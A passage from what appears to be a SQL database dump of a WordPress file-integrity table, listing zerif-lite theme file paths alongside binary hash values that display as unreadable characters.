x','wp-content/themes/zerif-lite/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']E$p17','sW\ZpQ1w{fh00a֧v','',0,'?'),('^A3 [a','wp-content/themes/zerif-lite/images/background1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nQe	5HYܥ-','mClBL[QU?אF','',0,'?'),('Jycٍā','wp-content/themes/zerif-lite/images/background2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?(3sCt','/LWݾb\0=RjzP؏','',0,'?'),('HRm>O* ','wp-content/themes/zerif-lite/images/bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|:y$w[\\۟A','OpPO\rRϴ4Z@\ZJ','',0,'?'),('s|:A(~(','wp-content/themes/zerif-lite/images/blank-latestposts.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+QU>','\rOEhi\0 +\0\\g\n6DR>i<j','',0,'?'),('$0Sj','wp-content/themes/zerif-lite/images/ccc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nS\'o4','at	\\\r4e]оwEgmꑟn}','',0,'?'),('~vC\n1*','wp-content/themes/zerif-lite/images/clients1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\'\Z510','UK@nQL[dMn</.','',0,'?'),('3y?vZ','wp-content/themes/zerif-lite/images/clients2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lX4N\niH%','NcLK46W1E3','',0,'?'),('l3K$Nu','wp-content/themes/zerif-lite/images/clients3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','io@','&yFy}-~TfE)b','',0,'?'),('C<g퇅\nu','wp-content/themes/zerif-lite/images/clients4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';qnᒔ1','ULxa1+\Zꇷ;sF]0U!̓|','',0,'?'),('F5oo|2_I','wp-content/themes/zerif-lite/images/clients5.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r*}grLTٞ','mcgXɭc+cC\ZPmԜ','',0,'?'),('Stɜ\n\rT5m','wp-content/themes/zerif-lite/images/envelope4-green.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':2c)< <','a(6N|ƂNwP1.2{','',0,'?'),('^Qw\Z󐡓','wp-content/themes/zerif-lite/images/left-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dXQbFRg^','sPX3o-+Oo\\b5ޥA','',0,'?'),('lb୫}wB\0+','wp-content/themes/zerif-lite/images/lines-dark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E.W[MB','et:BJ(\r:xQ0\",','',0,'?'),('m}%;DV','wp-content/themes/zerif-lite/images/lines.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ů»L_','MS`N{?qwv~I~:ހx','',0,'?'),('(筑tԄ$Z','wp-content/themes/zerif-lite/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+V?','@TeR-.J(7m','',0,'?'),(';OED\\/','wp-content/themes/zerif-lite/images/logo-themeisle.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':2E2lH(','WiAc9lt\0\Z^Y	X&','',0,'?'),('곜ZF','wp-content/themes/zerif-lite/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F&Vɟ剭F','yMP%.ikO-fi','',0,'?'),('~.!oN$h}','wp-content/themes/zerif-lite/images/map25-redish.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ฃnfG','*U7\ZJxU?XX{','',0,'?'),('v-,E','wp-content/themes/zerif-lite/images/menu-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']\\a瞷2','*,e;j{Xoh)fݗ','',0,'?'),('sn8lBm5O','wp-content/themes/zerif-lite/images/onepirate.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HFu^#r','\Z\Zb\\fd\Zk,+-K','',0,'?'),('1[,NX$p','wp-content/themes/zerif-lite/images/parallax.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PS>Oy5Y%%\0','(ᣮu ;<#?Qo5@ܙ','',0,'?'),('h	:\0Jnli','wp-content/themes/zerif-lite/images/responsiveboat.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9}bv;','8Ua\0PX/kZn7+qH?','',0,'?'),('$ۊJ_{`\"Yw=','wp-content/themes/zerif-lite/images/right-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\0~[n','p.HO*}]E\rޅ+\"C','',0,'?'),(')*Y','wp-content/themes/zerif-lite/images/search_icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DvP*-zprM','M:e۞z{3ZqGM0@','',0,'?'),('Ŝ;ӃN>_','wp-content/themes/zerif-lite/images/team1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y\r%fVsŞ','$LGbn]	o.֒|	r m9Hn','',0,'?'),('84͸9Xv+','wp-content/themes/zerif-lite/images/team2.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Τ>z&','̦kcd0=K50A8brDg5V','',0,'?'),('ym@5)','wp-content/themes/zerif-lite/images/team3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H=6]p','\r1yh݀_zj8\rI6=#[','',0,'?'),('Ia\0+','wp-content/themes/zerif-lite/images/team4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+8NNSGч6',')k&uai镜5Ȇb?Ѷ\ZMT','',0,'?'),('#SD%ah~','wp-content/themes/zerif-lite/images/telephone65-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ׅϋUa','6hL\"wwS+doFύh¯','',0,'?'),('*Be','wp-content/themes/zerif-lite/images/testimonial1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<k[.tqxQ','\n3bZG\nhû}霌W','',0,'?'),('}p	~ȧf{:x','wp-content/themes/zerif-lite/images/testimonial2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H.CF~','Oix\\BdX	P{ACDgE','',0,'?'),('0h#.','wp-content/themes/zerif-lite/images/testimonial3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!fHu]','yZ4Hi[j y?#vuJE','',0,'?'),('VJQq.eΛ','wp-content/themes/zerif-lite/images/ti-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rtc','\"/pVٱ& J,k^G[Vh','',0,'?'),('\"|К:Cp','wp-content/themes/zerif-lite/images/tr-black-1px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tfYHHٙ',';;WQpRPi&','',0,'?'),('Xc=tM,_fL','wp-content/themes/zerif-lite/images/woo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YGP>3>k','IPG<i1_bbFU$\n','',0,'?'),('.JlK+H\\Hȱ','wp-content/themes/zerif-lite/images/woostars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4ȾvwSO','Z酨\r`<1zӻkC','',0,'?'),('`6Z`Zhw\0dZ-','wp-content/themes/zerif-lite/images/zblackbeard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s6E@O`\r','U[ĲkqF,y̒bb&%$W','',0,'?'),('GG.I21\0','wp-content/themes/zerif-lite/images/zerius.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zo!M\\+5=','N3~|ib^cl','',0,'?'),('(:ɲk','wp-content/themes/zerif-lite/images/zifer-child.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' g*9|{','Nv\\*CC}TOI;7- Mr','',0,'?'),(']2h?Tr:','wp-content/themes/zerif-lite/inc/admin/welcome-screen/css/welcome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_u4`xM','on[6AaN]83U\n_','',0,'?'),('3w;\'LE|\0[','wp-content/themes/zerif-lite/inc/admin/welcome-screen/css/welcome_customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{lL#G>\"','Gm\']Y:I&Q9WQ}ƄR','',0,'?'),('\ZqVZ\"3ArǝOO','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jj~Ս:M$','!TK{΀>N[\',DR̅*','',0,'?'),('{+uUm%qm','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/onepirate.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~#qy','3:49לmAC	\\?@N','',0,'?'),('O(Ib#+','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/responsiveboat.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ch0Ȥq9<','Zڹwt*{\'Aö\'!|U','',0,'?'),('\ZU&ij','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zblackbeard.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wJ(bFV','I6!nl˺kKeBK`hpu!t','',0,'?'),('!rH%gFkc','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zerius.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u\ZZ _\\^','V--.P9B35ioB','',0,'?'),('+ؔ\0\\%2','wp-content/themes/zerif-lite/inc/admin/welcome-screen/img/zifer-child.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xzk2%jcc','1jR돘_g92h$!`=i!','',0,'?'),('~V+uON','wp-content/themes/zerif-lite/inc/admin/welcome-screen/js/welcome.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[o8A',' E^=h-=bq<-p','',0,'?'),('m}/cLǵ_w','wp-content/themes/zerif-lite/inc/admin/welcome-screen/js/welcome_customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hpqsEkIM','2rgY1@qx1)RQm݌-','',0,'?'),('L_4_jTUG','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/actions-required.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\"B!۩X[H','.\ZQy̱:\0`y閏nf','',0,'?'),('Ixf%5ɻi','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/changelog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mւʡ/8','1y&4\r>&*0l+[ ȉ','',0,'?'),('z%զTg5&','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/child-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q0s)\'X\"','SYuʵѳtq#E<X','',0,'?'),('v1\\&IJi','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/free_pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l⛙Zm,','Y@G5<0> |vM\'n','',0,'?'),('݆@aY0','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/getting-started.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XQy%\08s','1!1\0q0\r @yUuWz_(d','',0,'?'),('r#=azbp˕','wp-content/themes/zerif-lite/inc/admin/welcome-screen/sections/github.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z17j|Äi','\\hq@..Yz<MݾIl\\','',0,'?'),('=;MKmh\r(','wp-content/themes/zerif-lite/inc/admin/welcome-screen/welcome-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'Y?qǀ}J','K2J/!\07óרt?nX\r:','',0,'?'),('!u','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-customizer-theme-info-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=DPDsNH4','GQϭz#	d֓nKCc','',0,'?'),(';\'<Y1','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-customizer-theme-info-root.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uk𑜺͞ +$7',', gEڗ3>JWH;3n','',0,'?'),('r4\ZbâvMMB','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-zerif-customize-theme-info-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u}^b\"',' p~1*;Jmam','',0,'?'),('n.z^Ճ	In','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/class-zerif-customize-upsell-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eZWTl','ɤ~&1p;YIS`4oNC@','',0,'?'),('*6DsLNvk','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/css/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Z<»3Ė:','Ӛ\n&xEy	+H{hqtf','',0,'?'),('%T;-ujŒv','wp-content/themes/zerif-lite/inc/class/class-customizer-theme-info-control/js/zerif-upsell-customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZY݂bL-β','+}p,JX mŘ:XѠ5n','',0,'?'),('/[0\\):','wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A}wCԵ,{i','Kv3(?cs==	\ngIڎ','',0,'?'),('\\XAW2+x\\','wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2l&MOm+G;C','΄BO*dNm}pQ60Ǧ4:+','',0,'?'),('Ifu[&qۍ','wp-content/themes/zerif-lite/inc/customizer-info/class/class-zerif-customize-upsell.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','҈˳ɅSu2SR','QF,:5MZ&TY\0-','',0,'?'),('\Z~|te','wp-content/themes/zerif-lite/inc/customizer-info/css/customizer-info.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s[64@|\Z','@c%<vrLFGe','',0,'?'),('ovϧ2W','wp-content/themes/zerif-lite/inc/customizer-info/js/customizer-info-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*rSM/Ǝ','d\"EfQ\n)6Ca','',0,'?'),('IQB','wp-content/themes/zerif-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rnP\r','#rbV{Tx@Ӵ_w\\a-','',0,'?'),('2`zd-6MdC','wp-content/themes/zerif-lite/inc/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UAX_t','7ZL%KI$<Lw`<M','',0,'?'),('cKΰE=!','wp-content/themes/zerif-lite/inc/hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SybBc','C=8,]o?Cǝ','',0,'?'),('4՞7KiZ','wp-content/themes/zerif-lite/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vqrA`{4?(6','ɗA`Gu~&ad*):)fc#=A','',0,'?'),('pe=+Lt;4)','wp-content/themes/zerif-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<9wJ_%K','-wz-~٭«Wuא*O','',0,'?'),('Gͽ.','wp-content/themes/zerif-lite/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fsT\\c[','Prf?\\KR۽e\0eL;P','',0,'?'),('\'`|P11wS','wp-content/themes/zerif-lite/js/bootstrap.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\מuE','7TnP_h\'5II9!','',0,'?'),('gx<{2H|\Z','wp-content/themes/zerif-lite/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a.j7','E-s}%\ZaB\019hr,H	P','',0,'?'),('V}4ѣ$_	','wp-content/themes/zerif-lite/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y1X','GE-U@B4ʟE','',0,'?'),('ie_H\Z','wp-content/themes/zerif-lite/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\"ȶjȓP','٤mSm?޾jr^آ','',0,'?'),('Ukdy@<\'^P','wp-content/themes/zerif-lite/js/jquery.knob.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oI0J','v՝v8&#ZY٬E8#kLT','',0,'?'),('m=\0drTL뇷','wp-content/themes/zerif-lite/js/parallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dx-j.ڦ','Cn]瘦ߠEs4D}8=_&','',0,'?'),('\"ɩjAJM','wp-content/themes/zerif-lite/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*G1\r+4؛','p/RrƋ?̢熿=*_d','',0,'?'),(']jv','wp-content/themes/zerif-lite/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5%i2:8\Zg','GJ0y=2]@&2l3c_K','',0,'?'),(']RbDu2ڍ','wp-content/themes/zerif-lite/js/scrollReveal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~ⵥ\Z;WVƲ','M<G*dkjo(H%rs','',0,'?'),('tPit{9&rb','wp-content/themes/zerif-lite/js/smoothscroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%O/e;8','BJ0TW菊HY\\@+','',0,'?'),('KOsA>\ZܽaWJ!','wp-content/themes/zerif-lite/js/widget-media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T7#U.5','mR8?$kTsèc|^\ru','',0,'?'),('5&5\r#%Fd','wp-content/themes/zerif-lite/js/zerif.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Ouc	?Ow','#	E\\l@G0:6m#\nL','',0,'?'),('CdGŐ6m','wp-content/themes/zerif-lite/js/zerif_customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m\":CI','rXinX)U \'Oi}wt&','',0,'?'),('i^}\\)','wp-content/themes/zerif-lite/js/zerif_multiple_panels.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yٛ5-^|t','zs\Z(re~h|gМP50','',0,'?'),('X&E<!L','wp-content/themes/zerif-lite/languages/es_ES.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`@%YN','8 	me2k\nu)l7Yx	T','',0,'?'),('Zfk\'2P1','wp-content/themes/zerif-lite/languages/es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@s5g\n6Oe','\\4y`~/~eG^܎1','',0,'?'),('q<dex\\g<#','wp-content/themes/zerif-lite/languages/pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$>A@@X!D5','/W/L4jC=T%P륛%R)','',0,'?'),('+\\.g)~H','wp-content/themes/zerif-lite/languages/pl_PL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','){}(f','ލ<޳ե}HX}%$DY3FhoJx','',0,'?'),('7~>xw\0s','wp-content/themes/zerif-lite/languages/ro_RO.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#pAL)#r#z','>\"#JJTvla\"W0)4yc','',0,'?'),('G6__6b\">','wp-content/themes/zerif-lite/languages/ro_RO.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ػ0UWy%','E!LrslZVS7Q0','',0,'?'),('a˱ф0','wp-content/themes/zerif-lite/languages/zerif-lite.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nq޺n4#','`EK6:|܊vty$ӅST','',0,'?'),('[ae;#RL','wp-content/themes/zerif-lite/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϟ٦c>!F2','kzᴨEt/nP̃2\'','',0,'?'),('#[L;GNE&bv>','wp-content/themes/zerif-lite/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']>?\"a#_n#','of!ݏnsf^0{odgC\Z','',0,'?'),('H','wp-content/themes/zerif-lite/readme.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?&1z^b@','Ś\\Qbe2-A!BK݀,ǣ=];y','',0,'?'),('@\nծ9;XùE/','wp-content/themes/zerif-lite/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rSybHn}_','B`!rݙ^[neE-ڝ','',0,'?'),('އ9%ry2','wp-content/themes/zerif-lite/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ZPv','r~ytwOjK<ф	?','',0,'?'),(')e`n$Plf','wp-content/themes/zerif-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V!UuW\n{','aQaћ]t΢|f','',0,'?'),('7f1FM>{,','wp-content/themes/zerif-lite/sections/about_us.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AtFk','?@ǙPSعq:\'[\n.','',0,'?'),('L\r\"','wp-content/themes/zerif-lite/sections/big_title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=\"VR@<','u{<t\"ߴem:tU#?','',0,'?'),(':mFj$yH','wp-content/themes/zerif-lite/sections/latest_news.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oB9c~֮','\'<qY6_駰G~EJeXNG','',0,'?'),('\"}ߒImWR2tc','wp-content/themes/zerif-lite/sections/our_focus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1PR|DȌ','`BϬ~K_=`~7;K','',0,'?'),('Yɉ|+D#VS\"','wp-content/themes/zerif-lite/sections/our_team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r%Di\ZE*P','HK«pV(K29b痕\"R','',0,'?'),('RZ(#','wp-content/themes/zerif-lite/sections/ribbon_with_bottom_button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&~I(0zNqx','%[,QpKFJ_	D','',0,'?'),('d!VG	','wp-content/themes/zerif-lite/sections/ribbon_with_right_button.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k*}O\nT','L75#\nN4ӸmO\nw\\G!Pξ','',0,'?'),('ةu--%y\Z[','wp-content/themes/zerif-lite/sections/testimonials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8`8','iwso\\-l98K#yF\Z','',0,'?'),('\n,[ʪs','wp-content/themes/zerif-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',') c','hJRL	F]h<R_<','',0,'?'),('\r£A\"esw','wp-content/themes/zerif-lite/single-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U4>׹)Ës:=','a\n:12B>gc90F>V','',0,'?'),('Iߎz','wp-content/themes/zerif-lite/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9TpH!ݭM','{9E oʓPA\\8ĕM','',0,'?'),('١p/5v%rģ','wp-content/themes/zerif-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4~]̡','_Ozw0nd\n٤*X+4Z;e','',0,'?'),('4[N9!|','wp-content/themes/zerif-lite/template-blog-large.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nk~`O','7>peDREo`U:8ئ','',0,'?'),('x]I㎊\ZgI','wp-content/themes/zerif-lite/template-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\\F5ɴ','B%a;ldOR\n\Z#Q&6?!','',0,'?'),('ދǿ','wp-content/themes/zerif-lite/template-frontpage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?K=Z` c',':8בhH(3ΖWD\\	','',0,'?'),('|:)b&mnʳ','wp-content/themes/zerif-lite/template-fullwidth-no-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\\6?3\"',')}~˾̬CKLU6rE','',0,'?'),(',܍\rp_ΜN','wp-content/themes/zerif-lite/template-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V\0lF:\"5gs','E9K\">_9ʲ5n}/>7V','',0,'?'),('jVnUSF','wp-content/themes/zerif-lite/themeisle-hash.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e򾾇:jR','L\Z,WOWҜ','',0,'?'),('QDp','wp-content/themes/zerif-lite/ti-about-page/class-ti-about-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7`A>ڏj<','K\"30cMd;B&V45','',0,'?'),('ھV氇1|zpL','wp-content/themes/zerif-lite/ti-about-page/css/ti_about_page_css.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V(asZEd+y','\"/Ci\n7HPS\r3)y-#`g-6','',0,'?'),('| +PXǱ','wp-content/themes/zerif-lite/ti-about-page/images/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jj~Ս:M$','!TK{΀>N[\',DR̅*','',0,'?'),('jOh','wp-content/themes/zerif-lite/ti-about-page/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>B;^prTK','DϛB}P)B`Y~/0b','',0,'?'),('yafGh\\I','wp-content/themes/zerif-lite/ti-about-page/images/neve.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','98OmJDu','s_$v8,IS5PP\"','',0,'?'),('gk^_\0','wp-content/themes/zerif-lite/ti-about-page/images/placeholder_plugin.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|da',',jU#/v²V*TVA;','',0,'?'),('ޚ!{&','wp-content/themes/zerif-lite/ti-about-page/js/ti_about_page_scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r{BNaax\Z','U5{D\r)uV%oD-5O4,vj','',0,'?'),('xq<qZK%F\\','wp-content/themes/zerif-lite/ti-customizer-notify/class-ti-customizer-notify.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','װ@7kCS','Jꄏut:߹ms\'z\r2J','',0,'?'),('!bJ@/߄','wp-content/themes/zerif-lite/ti-customizer-notify/css/ti-customizer-notify-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+/(<wzt','01T|vg)2kWG,	R{YƊzr#','',0,'?'),(',_sdҨQ]f8\\..','wp-content/themes/zerif-lite/ti-customizer-notify/js/ti-customizer-notify-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-}[	U>d.P','ISk@\\Q9@XvC','',0,'?'),('!o0~$ҏjPp','wp-content/themes/zerif-lite/ti-customizer-notify/ti-customizer-notify-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z6`pk\"','\0Γ{j|p5%ynTNb\nDj','',0,'?'),('U=	\\&n!e}','wp-content/themes/zerif-lite/ti-customizer-notify/ti-notify-system-checks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rMHL(y','LJMmīy886\ZrC1O]j','',0,'?'),('IhE2VM.rX','wp-content/themes/zerif-lite/ti-prevdem/img/1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w@ܠ\r!]','CJmɡG8rBqQ|','',0,'?'),(')+Χ,','wp-content/themes/zerif-lite/ti-prevdem/img/10.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0OxfRinr_\"','cp:eZIX&;c+{6JI','',0,'?'),('s.zN\r\'d','wp-content/themes/zerif-lite/ti-prevdem/img/2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̛2_~~j','E)I<еByx8e?','',0,'?'),('y}|hu','wp-content/themes/zerif-lite/ti-prevdem/img/3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɗYv Y\'','9ē{w2 qͺ	;{hŨ','',0,'?'),('#[70k6v&l','wp-content/themes/zerif-lite/ti-prevdem/img/4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9d@~20@+','!1/Y	R37Qig\\\0(yyC?','',0,'?'),('6ʠ92)','wp-content/themes/zerif-lite/ti-prevdem/img/5.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\Zjd_A[','x[@Ș.@8','',0,'?'),('W3Ӝ<rm=','wp-content/themes/zerif-lite/ti-prevdem/img/6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nj3+!=\r\\`','R8bSvHF[3M.','',0,'?'),('2lh)Ԏ','wp-content/themes/zerif-lite/ti-prevdem/img/7.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʗՀ6','Wq4;uZ|ݘY&?&Dm','',0,'?'),('mY5I0E','wp-content/themes/zerif-lite/ti-prevdem/img/8.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cEhӐN\\